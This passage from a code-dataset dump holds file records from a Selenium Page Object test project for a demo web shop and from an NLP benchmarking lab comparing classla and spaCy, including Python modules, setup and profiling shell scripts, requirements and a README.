"text": "__EN_TEXT_FILE__ = 'data/text/raw-en.txt'\n__SL_TEXT_FILE__ = 'data/text/raw-slo.txt'\n\nfrom classla import Document\n\n\ndef sl_docs(batch_size=1):\n if batch_size == 1:\n yield [Document([], text=next(sl(batch_size)))]\n else:\n yield [Document([], text=d) for d in sl(batch_size)]\n\n\ndef sl(batch_size=1):\n yield from _generator(__SL_TEXT_FILE__, batch_size)\n\n\ndef en(batch_size=1):\n yield from _generator(__EN_TEXT_FILE__, batch_size)\n\n\ndef en_size() -> int:\n return sum(1 for _ in open(__EN_TEXT_FILE__, 'rb'))\n\n\ndef sl_size() -> int:\n return sum(1 for _ in open(__SL_TEXT_FILE__, 'rb'))\n\n\ndef _generator(file, batch_size):\n assert batch_size > 0\n\n # note: yields str (if batch_size is 1) or list[str] if batch_size gt 1\n with open(file, encoding='utf-8') as reader:\n assert batch_size >= 1\n\n if batch_size > 1:\n batch = []\n for line in reader:\n if batch_size == 1:\n yield line.rstrip()\n else:\n batch.append(line.rstrip())\n if len(batch) == batch_size:\n yield batch\n batch.clear()\n if batch_size > 1 and len(batch) > 0:\n yield batch\n"
},
{
"alpha_fraction": 0.5555555820465088,
"alphanum_fraction": 0.5566264986991882,
"avg_line_length": 31.478260040283203,
"blob_id": "5c3e29afaa98f82c11eef1f3f2e7fdb428d32451",
"content_id": "0b4f9e718bddc63ef8dc0b7176693701e18adbcd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3735,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 115,
"path": "/benchmarks/bm.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import argparse\nimport cProfile\nimport logging\nimport os\nfrom importlib.metadata import version\nfrom pathlib import Path\n\nimport time\nimport torch\n\nfrom measure import close_report\nfrom measure import open_report\n\n__VERSION__ = \"1.0.2\"\n\nLOG = logging.getLogger('bm')\n\nCLASSLA_MODELS_DIR = 'var/bm/models'\nDEFAULT_SPACY_MODEL = 'en_core_web_md'\nTRF_SPACY_MODEL = 'en_core_web_trf'\n\n\ndef run(name: str, benchmarks: dict):\n all_ = sorted(benchmarks.keys())\n\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO,\n )\n\n LOG.info(\"running benchmarks: {} - {}\".format(name, all_))\n\n if torch.cuda.is_available():\n LOG.info(\"... CUDA devices: {}\".format(torch.cuda.device_count()))\n LOG.info(\"... ... current: {}\".format(torch.cuda.current_device()))\n LOG.info(\"... ... name: {}\".format(torch.cuda.get_device_name(torch.cuda.current_device())))\n else:\n LOG.info(\"... CUDA not available\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--bm',\n nargs='+',\n help=\"benchmark: all or {} | default=all\".format(all_),\n default='all')\n parser.add_argument('--no-report', action='store_true', help='Don\\'t generate report at var/bm/reports.')\n parser.add_argument('--profile', default=None, help='Path where collected cProfile stats are generated'\n ' | default=None')\n parser.add_argument('--cpu', action='store_true', help='Disable CUDA.')\n parser.set_defaults(no_report=False)\n parser.set_defaults(cpu=False)\n args = parser.parse_args()\n\n LOG.info(\"... args: {}\".format(args))\n\n if args.cpu:\n accelerator = \"cpu[preferred]\"\n elif not torch.cuda.is_available():\n accelerator = \"cpu[no-cuda-available]\"\n else:\n accelerator = \"cuda[{}]\".format(torch.cuda.get_device_name(torch.cuda.current_device()))\n\n LOG.info(\"... engaged accelerator: {}\".format(accelerator))\n LOG.info(\"... classla version: {}\".format(version('classla')))\n LOG.info(\"... obeliks version: {}\".format(version('obeliks')))\n LOG.info(\"... torch version: {}\".format(version('torch')))\n\n if not args.no_report:\n tag = \"{}-{}\".format(name, _format_bm(args.bm))\n open_report(prefix=tag + \"-\", info={'tag': tag,\n 'bm-version': __VERSION__,\n 'classla-v': version('classla'),\n 'obeliks-v': version('obeliks'),\n 'torch-v': version('torch'),\n 'accelerator': accelerator})\n\n profile_file = args.profile\n\n pr = None\n if profile_file is not None:\n LOG.info(\"... running cProfile profiler!\")\n os.makedirs(Path(profile_file).parent, exist_ok=True)\n pr = cProfile.Profile()\n\n if isinstance(args.bm, list):\n bms = args.bm\n elif args.bm == 'all':\n bms = all_\n elif args.bm in benchmarks:\n bms = [args.bm]\n else:\n raise Exception(\"unknown benchmark: {}\".format(args.bm))\n\n for bm in bms:\n if pr is not None:\n pr.enable()\n benchmarks[bm]()\n if pr is not None:\n pr.disable()\n time.sleep(1)\n\n if pr is not None:\n LOG.info(\"see cProfile stats: {}\".format(profile_file))\n pr.dump_stats(profile_file)\n\n if not args.no_report:\n close_report()\n\n LOG.info(\"completed, bye bye!\")\n\n\ndef _format_bm(bm):\n if isinstance(bm, list):\n return '-'.join(bm)\n return bm\n"
},
{
"alpha_fraction": 0.7149028182029724,
"alphanum_fraction": 0.7213822603225708,
"avg_line_length": 23.36842155456543,
"blob_id": "4c62f02c68a25d4e972edf8d6b209245c26dcaf5",
"content_id": "ba66d919df4ebb97e11b40bd6e25a8ebd4f8abc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 19,
"path": "/scripts/setup.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\nVAR_DIR=./var/bm\nmkdir -p $VAR_DIR\n\nMODELS_DIR=$VAR_DIR/models\nmkdir -p $MODELS_DIR\n\npython -m pip install -U pip setuptools wheel\npython -m pip install -U spacy[transformers,cuda112]\n\npython -m spacy download en_core_web_md\npython -m spacy download en_core_web_trf\n\npython -c \"import classla; classla.download(lang='sl', dir='${MODELS_DIR}', logging_level='info')\" || echo \"failed to download slo model\"\n"
},
{
"alpha_fraction": 0.6930692791938782,
"alphanum_fraction": 0.6930692791938782,
"avg_line_length": 13.428571701049805,
"blob_id": "9fe73232d204ebb704b939a3b7fff479b6214a6d",
"content_id": "6fe2a667bc20d422c83d1f0639b62abfab800ebe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 7,
"path": "/scripts/bm_ner_trf.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\npython benchmarks/bm_ner.py --bm spacy_trf\n"
},
{
"alpha_fraction": 0.6086350679397583,
"alphanum_fraction": 0.6155988574028015,
"avg_line_length": 22.129032135009766,
"blob_id": "433a4539f5db6d1a4737a8c206efdd64b0e304ea",
"content_id": "1a5de3713607242a2cb547dba06943e3e488bc6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 718,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 31,
"path": "/scripts/profile_lem_classla_quick.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\nPROFILE_DIR='var/bm/profiles'\n\nNOW=$(date +\"%Y%m%d_%H%M%S\")\n\nPROFILE_FILE=\"${PROFILE_DIR}/${NOW}_lem-classla-q.pstat\"\nPROFILE_FILE_2=\"${PROFILE_DIR}/${NOW}_lem-classla_idl-q.pstat\"\n\npython benchmarks/bm_lem.py --bm classla_quick --no-report --profile \"$PROFILE_FILE\"\npython benchmarks/bm_lem.py --bm classla_idl_quick --no-report --profile \"$PROFILE_FILE_2\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_2\"\n\nwhile [[ $# -ne 0 ]]\ndo\n arg=\"$1\"\n case \"$arg\" in\n --interactive)\n snakeviz $PROFILE_FILE\n ;;\n *)\n ;;\n esac\n shift\ndone\n\n"
},
{
"alpha_fraction": 0.39411765336990356,
"alphanum_fraction": 0.6470588445663452,
"avg_line_length": 13.166666984558105,
"blob_id": "ff9f8b8a3bac0582baa116112b56b84680a64320",
"content_id": "58a6db6b36e7ad62da873d5daea74d7d07ce1bd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 170,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 12,
"path": "/requirements.txt",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "numpy~=1.20.3\ntorch~=1.8.1\nrequests~=2.25.1\nsix~=1.16.0\ntqdm~=4.61.0\nregex~=2021.4.4\nlxml~=4.6.3\npandas~=1.2.4\npsutil~=5.8.0\nsnakeviz~=2.1.0\npytest~=6.2.4\nclassla~=1.0.1\n"
},
{
"alpha_fraction": 0.7475076913833618,
"alphanum_fraction": 0.7788653373718262,
"avg_line_length": 37.83802795410156,
"blob_id": "49ad3ae691f4484855156c5b83be21d839e76495",
"content_id": "67ff2a65516e65c6fa8bd87c459ebdb8b3727dc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5517,
"license_type": "no_license",
"max_line_length": 355,
"num_lines": 142,
"path": "/README.md",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "# CLASSLA LAB\n\nHere is a lab environment focused on benchmarking & profiling `classla` NLP processors. The benchmarks based on `spacy`\ntechnology are also implemented for study and comparison. The idea behind this repository is to provide a reference\nenvironment where the performance of classla processors can be analyzed and perhaps optimized (in future phases). Only\ninference (prediction) pipelines are analyzed.\n\nThe resulting observations are discussed at the end of this doc.\n\n## Installation\n\n```bash\n\n# install project\ngit clone https://github.com/IgorTavcar/classla_lab\ncd classla_lab\npython3 -m venv env\nsource env/bin/activate\npython3 -m pip install -r requirements.txt \n\n```\n\n## Setup\n\nsh scripts/setup.sh\n\n## Data\n\nThe folder `data/text` contains two files `raw-en.txt` and `raw-slo.txt`. which are used as input in benchmark and\nprofile sessions. Each file contains text from a novel and two web articles with the same content in `sl` and `en`\nlanguages. The files are formatted in '1 paragraph per line' format, the lines are shuffled (to avoid copyright issues)\nand are not aligned.\n\n## Benchmarking\n\n```bash\n# quick benchmarks (short-lasting)\nsh scripts/bm_quick.sh\n\n# run all benchmarks \nsh scripts/bm_all.sh\n\n# classla (lstm) vs spacy (transformers) benchmarks\nsh scripts/bm_quick_trf.sh\nsh scripts/bm_all_trf.sh\n\n```\n\nClassla benchmarks are based on the `lstm` backbone (except for sentence tokenization which is based on `regex`). Spacy\nbenchmarks are based on the `tok2vec` backbone, `*_trf` benchmarks are based on the `transformers` backbone. Benchmark\nreports are at `var/bm/reports`.\n\n## Profiling\n\n```bash\n# method: cProfile\n# use option --interactive for interactive sessions (snakeviz) \n\n# run all profiles\nsh scripts/profile_all.sh\n\n# profile classla pipeline 'tokenize,pos,lemma'\nsh scripts/profile_lem_classla.sh\nsh scripts/profile_lem_classla_quick.sh\n\n# profile classla pipeline 'tokenize,lemma' + lemma-identity\nsh scripts/profile_lem_classla_idl_quick.sh\n\n# profile classla pipeline 'tokenize,ner'\nsh scripts/profile_ner_classla.sh\nsh scripts/profile_ner_classla_quick.sh\n\n# profile classla pipeline 'tokenize,pos'\nsh scripts/profile_pos_classla.sh\nsh scripts/profile_pos_classla_quick.sh\n\n# profile classla pipeline 'tokenize'\nsh scripts/profile_sent_classla.sh\n```\n\nResulted `*.pstat` files are at `var/bm/profiles`. For (browser based) interactive sessions use option `--interactive` (\nsee `snakeviz` doc).\n\n## Observations\n\n### Tokenization\n\nThe implementation of sentence tokenization in the module `obeliks` is suboptimal. A hotspot was discovered in\nthe `obeliks.rules.tokenize()` method. The function `load_rules()` is invoked twice for each `tokenize()` call. It would\nbe better if the rules are loaded and cached during the initialization phase of the processor.\n\n\n[tokenizer benchmarks (workstation)](results/reports/workstation_00/tok-all-20210619_131409.csv)\n\n[tokenizer benchmarks (laptoop)](results/reports/macbook_00/tok-all-20210619_060714.csv)\n\n#### Comments\n\n[bm_sentences_classla_obeliks_joined_sl()](https://github.com/IgorTavcar/classla_lab/blob/1dfe45cfc4b8040a9df5ca971a50332431e288e8/benchmarks/bm_tok.py#L24)\n\nThis benchmark shows the speed of the obeliks tokenizer that would be (approximately) achieved, if the hotspot problem\nwas fixed.\n\n[bm_sentences_classla_obeliks_batched_sl()](https://github.com/IgorTavcar/classla_lab/blob/1dfe45cfc4b8040a9df5ca971a50332431e288e8/benchmarks/bm_tok.py#L34)\n\nThis benchmark is based on the naive assumption that batching is supported by the classla pipeline. But - the tokenizer\nprocessor does not support list-of-strings input, so in this experiment the lines are joined by 'new-line' separators.\nThis approach does not improve the speed of processing ...\n\n[bm_sentences_classla_reldi_sl()](https://github.com/IgorTavcar/classla_lab/blob/1dfe45cfc4b8040a9df5ca971a50332431e288e8/benchmarks/bm_tok.py#L46)\n\nReldi tokenizer is much faster than obeliks. The difference in the number of sentences (between the two) is in the range of a few percent.\n\n[bm_sentences_classla_multi_docs_sl()](https://github.com/IgorTavcar/classla_lab/blob/1dfe45cfc4b8040a9df5ca971a50332431e288e8/benchmarks/bm_tok.py#L56)\n\nThis invocation will raise for classla versions <= 1.0.1.; multi-docs is a feature of stanza v1.2., but is not implemented in classla~=1.0.1..\n\n\n\n### Pipeline\n\nThe classla processor pipeline lacks:\n* streaming api:`Iterable[str] (YIELD)` - for a sequence of texts to process\n* `multiprocessing` support - for parallelizing text processing.\n* `multi-documents` support (stanza v1.2.) \n\n### POS, NER, LEMMA processors\n\nThese processors are based on the `LSTM` seq2seq architecture. The accuracy of these models is much better than that of statistical models, but even so, a **transformer** revolution currently rules the world (for so many ML tasks) ...\n\n\n#### Acceleration \n\nRNN acceleration is no joke. RNN computations involve intra/er/-state dependencies. These lead to poor hardware utilization and low performance. Compare *execution times* of `bm_classla_lemmas_sl()` and `bm_spacy_lemmas_en_trf()` in [lemmatization pipeline benchmarks](results/reports/workstation_00/lem-classla-classla_idl-spacy_trf-20210619_133953.csv).\n\n\nThe maximum GPU load was around 37% (for classla pipelines).\n\n## Discussion\n\n* introduction of `transformers` backbone\n* transfer of `classla` models to `spacy` and `huggingface` eco-systems\n\n\n"
},
{
"alpha_fraction": 0.780075192451477,
"alphanum_fraction": 0.780075192451477,
"avg_line_length": 27.052631378173828,
"blob_id": "82aaccaa5cfaf374cbd3004b01e5d00bef3bd46f",
"content_id": "6c01d2d788c8c8faceb595aa0b71794895d70d53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 532,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 19,
"path": "/scripts/bm_all.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\npython benchmarks/bm_tok.py\n\npython benchmarks/bm_pos.py --bm classla_quick spacy_quick\npython benchmarks/bm_ner.py --bm classla_quick spacy_quick\npython benchmarks/bm_lem.py --bm classla_quick classla_idl_quick spacy_quick\n\npython benchmarks/bm_pos.py\npython benchmarks/bm_ner.py\npython benchmarks/bm_lem.py\n\npython benchmarks/bm_pos.py --bm classla spacy_trf\npython benchmarks/bm_ner.py --bm classla spacy_trf\npython benchmarks/bm_lem.py --bm classla classla_idl spacy_trf"
},
{
"alpha_fraction": 0.7200193405151367,
"alphanum_fraction": 0.7200193405151367,
"avg_line_length": 44.9555549621582,
"blob_id": "08b3a3d6f2768da1fe0266d525640a55cec4b617",
"content_id": "92677dbb2b093bd9fb9f2fe47125dd45e2487488",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2068,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 45,
"path": "/scripts/profile_all.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\nPROFILE_DIR='var/bm/profiles'\n\nNOW=$(date +\"%Y%m%d_%H%M%S\")\n\nPROFILE_FILE_TOK=\"${PROFILE_DIR}/${NOW}_tok-classla.pstat\"\n\nPROFILE_FILE_POS_Q=\"${PROFILE_DIR}/${NOW}_pos-classla-q.pstat\"\nPROFILE_FILE_NER_Q=\"${PROFILE_DIR}/${NOW}_ner-classla-q.pstat\"\nPROFILE_FILE_LEM_Q=\"${PROFILE_DIR}/${NOW}_lem-classla-q.pstat\"\nPROFILE_FILE_LEM_IDL_Q=\"${PROFILE_DIR}/${NOW}_lem-classla_idl-q.pstat\"\n\nPROFILE_FILE_POS=\"${PROFILE_DIR}/${NOW}_pos-classla.pstat\"\nPROFILE_FILE_NER=\"${PROFILE_DIR}/${NOW}_ner-classla.pstat\"\nPROFILE_FILE_LEM=\"${PROFILE_DIR}/${NOW}_lem-classla.pstat\"\nPROFILE_FILE_LEM_IDL=\"${PROFILE_DIR}/${NOW}_lem-classla_idl.pstat\"\n\npython benchmarks/bm_tok.py --bm classla --no-report --profile \"$PROFILE_FILE_TOK\"\n\npython benchmarks/bm_pos.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_POS_Q\"\npython benchmarks/bm_ner.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_NER_Q\"\npython benchmarks/bm_lem.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_LEM_Q\"\npython benchmarks/bm_lem.py --bm classla_idl_quick --no-report --profile \"$PROFILE_FILE_LEM_IDL_Q\"\n\npython benchmarks/bm_pos.py --bm classla --no-report --profile \"$PROFILE_FILE_POS\"\npython benchmarks/bm_ner.py --bm classla --no-report --profile \"$PROFILE_FILE_NER\"\npython benchmarks/bm_lem.py --bm classla --no-report --profile \"$PROFILE_FILE_LEM\"\npython benchmarks/bm_lem.py --bm classla_idl --no-report --profile \"$PROFILE_FILE_LEM_IDL\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE_TOK\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE_POS_Q\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_NER_Q\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_LEM_Q\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_LEM_IDL_Q\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE_POS\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_NER\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_LEM\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_LEM_IDL\"\n"
},
{
"alpha_fraction": 0.6245277523994446,
"alphanum_fraction": 0.6320837140083313,
"avg_line_length": 31.77142906188965,
"blob_id": "461733e672e89eea4ff8f5086172c017ad4c9774",
"content_id": "0daafdc330ce3fa9ed3c4bf2573d80a36db53d44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3441,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 105,
"path": "/benchmarks/bm_tok.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport classla\nimport spacy\n\nimport bm\nimport data\nfrom measure import measure\n\nLOG = logging.getLogger('bm_tok')\n\n\n@measure\ndef bm_sentences_classla_obeliks_sl():\n nlp = classla.Pipeline(processors='tokenize', dir=bm.CLASSLA_MODELS_DIR, lang='sl')\n n = 0\n for line in data.sl():\n doc = nlp(line)\n n += len(doc.sentences)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_classla_obeliks_joined_sl():\n # This benchmark shows the speed of the obeliks tokenizer that would be (approximately) achieved\n # ... if the hotspot problem was fixed.\n nlp = classla.Pipeline(processors='tokenize', dir=bm.CLASSLA_MODELS_DIR, lang='sl')\n str = \" \".join(data.sl())\n doc = nlp(str)\n return {'sentences': len(doc.sentences)}\n\n\n@measure\ndef bm_sentences_classla_obeliks_batched_sl():\n # This benchmark is based on naive assumption that batching of input samples is supported.\n # Splitting the samples in lines does not improve the performance of the pipeline.\n nlp = classla.Pipeline(processors='tokenize', dir=bm.CLASSLA_MODELS_DIR, lang='sl')\n n = 0\n for batch in data.sl(50):\n doc = nlp('\\n'.join(batch)) # lists are not supported\n n += len(doc.sentences)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_classla_reldi_sl():\n nlp = classla.Pipeline(processors='tokenize', dir=bm.CLASSLA_MODELS_DIR, tokenize_library='reldi', lang='sl')\n n = 0\n for line in data.sl():\n doc = nlp(line)\n n += len(doc.sentences)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_classla_multi_docs_sl():\n # This invocation will raise for classla versions <= 1.0.1.\n # ... Multi-docs is a feature of stanza v1.2., but is not implemented in classla~=1.0.1.\n nlp = classla.Pipeline(processors='tokenize', dir=bm.CLASSLA_MODELS_DIR, lang='sl')\n n = 0\n for docs in data.sl_docs(64):\n result = nlp(docs)\n n += sum(len(doc.sentences) for doc in result)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_spacy_3cpu_en():\n nlp = spacy.load(bm.DEFAULT_SPACY_MODEL, exclude=['ner', 'attribute_ruler', 'lemmatizer'])\n n = 0\n for doc in nlp.pipe(data.en(), n_process=3):\n n += sum(1 for _ in doc.sents)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_spacy_en():\n nlp = spacy.load(bm.DEFAULT_SPACY_MODEL, exclude=['ner', 'attribute_ruler', 'lemmatizer'])\n n = 0\n for doc in nlp.pipe(data.en()):\n n += sum(1 for _ in doc.sents)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_spacy_fast_en():\n nlp = spacy.load(bm.DEFAULT_SPACY_MODEL,\n exclude=[\"tok2vec\", \"tagger\", \"parser\", \"attribute_ruler\", \"lemmatizer\", \"ner\"])\n nlp.add_pipe('sentencizer')\n n = 0\n for doc in nlp.pipe(data.en()):\n n += sum(1 for _ in doc.sents)\n return {'sentences': n}\n\n\nif __name__ == '__main__':\n benchmarks = {'classla': bm_sentences_classla_obeliks_sl,\n 'classla_reldi': bm_sentences_classla_reldi_sl,\n 'classla_joined': bm_sentences_classla_obeliks_joined_sl,\n 'classla_batched': bm_sentences_classla_obeliks_batched_sl,\n 'classla_multi_docs': bm_sentences_classla_multi_docs_sl,\n 'spacy': bm_sentences_spacy_en,\n 'spacy_parallel': bm_sentences_spacy_3cpu_en,\n 'spacy_fast': bm_sentences_spacy_fast_en}\n bm.run(\"tok\", benchmarks)\n"
}
] | 19 |
Stalnyetapki/pattern_application_Page_Object
|
https://github.com/Stalnyetapki/pattern_application_Page_Object
|
1d5a422622bf4a0418e42bb2cb5b84bbee7fee09
|
07bedf123f0326c05a2462c40fade9b93726b8bb
|
e05c2cea3646711eafce287688e61e3b8dd8ce54
|
refs/heads/master
| 2021-06-21T20:56:56.598348 | 2019-07-02T22:59:40 | 2019-07-02T22:59:40 | 193,476,954 | 1 | 0 | null | 2019-06-24T09:40:09 | 2020-05-13T17:14:55 | 2021-04-20T18:15:10 |
Python
|
[
{
"alpha_fraction": 0.6844783425331116,
"alphanum_fraction": 0.6870229244232178,
"avg_line_length": 28.11111068725586,
"blob_id": "57cf70b01dd041260a097b4c273985f21184ef5a",
"content_id": "511b47e87c1f1552aacf3017fae4826495eacc40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 802,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 27,
"path": "/test_main_page.py",
"repo_name": "Stalnyetapki/pattern_application_Page_Object",
"src_encoding": "UTF-8",
"text": "from .pages.main_page import MainPage\nfrom .pages.login_page import LoginPage\n\n\ndef test_guest_can_go_to_login_page(driver):\n link = \"http://selenium1py.pythonanywhere.com/\"\n page = MainPage(driver, link)\n page.open()\n # возвращать нужный Page Object\n # login_page = page.go_to_login_page()\n # login_page.should_be_login_page()\n login_page = LoginPage(driver, driver.current_url)\n login_page.should_be_login_page()\n\n\ndef go_to_login_page(driver):\n link = driver.find_element_by_css_selector(\"#login_link\")\n link.click()\n alert = driver.switch_to.alert\n alert.accept()\n\n\ndef test_guest_should_see_login_link(driver):\n link = \"http://selenium1py.pythonanywhere.com/\"\n page = MainPage(driver, link)\n page.open()\n page.should_be_login_link()\n"
},
{
"alpha_fraction": 0.7164846062660217,
"alphanum_fraction": 0.7164846062660217,
"avg_line_length": 54.94444274902344,
"blob_id": "a4435fe8355c8390ac3512ca00f97707a3509fa7",
"content_id": "7f72881db0a2f911802678ebfdc7e6e18fc740fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2014,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 36,
"path": "/pages/product_page.py",
"repo_name": "Stalnyetapki/pattern_application_Page_Object",
"src_encoding": "UTF-8",
"text": "from .base_page import BasePage\nfrom .locators import ProductPageLocators\n\n\nclass ProductPage(BasePage):\n\n def take_product_name(self):\n product = self.driver.find_element(*ProductPageLocators.PRODUCT_NAME)\n return product.text\n\n def take_product_price(self):\n price = self.driver.find_element(*ProductPageLocators.PRODUCT_PRICE)\n return price.text\n\n def press_button_add_in_basket(self):\n button_add_in_basket = self.driver.find_element(*ProductPageLocators.BUTTON_ADD_IN_BASKET)\n button_add_in_basket.click()\n\n def should_be_product_name_in_adding_message(self, name):\n assert self.is_element_present(*ProductPageLocators.PRODUCT_NAME)\n product = self.driver.find_element(*ProductPageLocators.PRODUCT_NAME)\n assert self.is_element_present(*ProductPageLocators.PRODUCT_NAME_IN_MESSAGE)\n name_in_message = self.driver.find_element(*ProductPageLocators.PRODUCT_NAME_IN_MESSAGE)\n assert product.text == name_in_message.text, f\"{product.text} does not match {name_in_message.text}\"\n assert name == name_in_message.text, f\"added {name} on adding page, but in basket added {name_in_message.text}\"\n assert name == product.text, f\"added {name} on adding page, but after name of product was {product.text}\"\n\n def should_be_price_of_product_in_basket_value(self, price):\n assert self.is_element_present(*ProductPageLocators.PRODUCT_PRICE)\n product_price = self.driver.find_element(*ProductPageLocators.PRODUCT_PRICE)\n assert self.is_element_present(*ProductPageLocators.PRICE_IN_MESSAGE)\n price_in_message = self.driver.find_element(*ProductPageLocators.PRICE_IN_MESSAGE)\n assert product_price.text == price_in_message.text, \"product price does not match basket price\"\n assert price == price_in_message.text, \\\n \"product price on adding page does not match basket price when product added\"\n assert price == product_price.text, f\"{price} != {product_price}\"\n"
},
{
"alpha_fraction": 0.6961602568626404,
"alphanum_fraction": 0.6994991898536682,
"avg_line_length": 43.37036895751953,
"blob_id": "c3cad43a0d446cafae54e47c28a68581fb60b57c",
"content_id": "8a60c87e28c1be71d8bef1970330ec67c2d34952",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1198,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 27,
"path": "/pages/locators.py",
"repo_name": "Stalnyetapki/pattern_application_Page_Object",
"src_encoding": "UTF-8",
"text": "from selenium.webdriver.common.by import By\n\n\nclass MainPageLocators:\n LOGIN_LINK = (By.CSS_SELECTOR, \"#login_link\")\n\n\nclass LoginPageLocators:\n LOGIN_FORM = (By.ID, \"login_form\")\n EMAIL_INPUT_LOGIN_FORM = (By.CLASS_NAME, \"login-username\")\n PASSWORD_INPUT_LOGIN_FORM = (By.CLASS_NAME, \"login-password\")\n PASSWORD_LINK_LOGIN_FORM = (By.CSS_SELECTOR, \"p > a\")\n BUTTON_SUBMIT_LOGIN_FORM = (By.CLASS_NAME, \"login_submit\")\n\n REGISTRATION_FORM = (By.ID, \"register_form\")\n EMAIL_INPUT_REGISTRATION_FORM = (By.CLASS_NAME, \"registration-email\")\n PASSWORD_INPUT_REGISTRATION_FORM = (By.CLASS_NAME, \"registration-password1\")\n REPEAT_PASSWORD_INPUT_REGISTRATION_FORM = (By.CLASS_NAME, \"registration-password2\")\n BUTTON_SUBMIT_REGISTRATION_FORM = (By.CLASS_NAME, \"registration_submit\")\n\n\nclass ProductPageLocators:\n BUTTON_ADD_IN_BASKET = (By.CSS_SELECTOR, \".btn-add-to-basket\")\n PRODUCT_NAME = (By.CSS_SELECTOR, \".product_main > h1\")\n PRODUCT_PRICE = (By.CSS_SELECTOR, \".product_main > .price_color\")\n PRODUCT_NAME_IN_MESSAGE = (By.CSS_SELECTOR, \".alert-success:nth-child(1) div.alertinner > strong\")\n PRICE_IN_MESSAGE = (By.CSS_SELECTOR, \".alert-info strong\")\n"
},
{
"alpha_fraction": 0.7100840210914612,
"alphanum_fraction": 0.7100840210914612,
"avg_line_length": 33,
"blob_id": "5162cb656307b40eda5449d82b53ce7264f23c50",
"content_id": "47bc786ce465ada6b22c485af9f3a72bb1533ad5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 492,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 14,
"path": "/pages/main_page.py",
"repo_name": "Stalnyetapki/pattern_application_Page_Object",
"src_encoding": "UTF-8",
"text": "from .base_page import BasePage\nfrom .locators import MainPageLocators\n\n\nclass MainPage(BasePage):\n\n def go_to_login_page(self):\n link = self.driver.find_element(*MainPageLocators.LOGIN_LINK)\n link.click()\n # возвращать нужный Page Object\n # return LoginPage(driver=self.driver, url=self.driver.current_url)\n\n def should_be_login_link(self):\n assert self.is_element_present(*MainPageLocators.LOGIN_LINK), \"Login link is not presented\"\n"
},
{
"alpha_fraction": 0.6122787594795227,
"alphanum_fraction": 0.6421459913253784,
"avg_line_length": 68.42308044433594,
"blob_id": "26d7363766e9654dca5b508c38a76baec4d58307",
"content_id": "2f215c4be83cf2550c608964807aa6b0bb669650",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
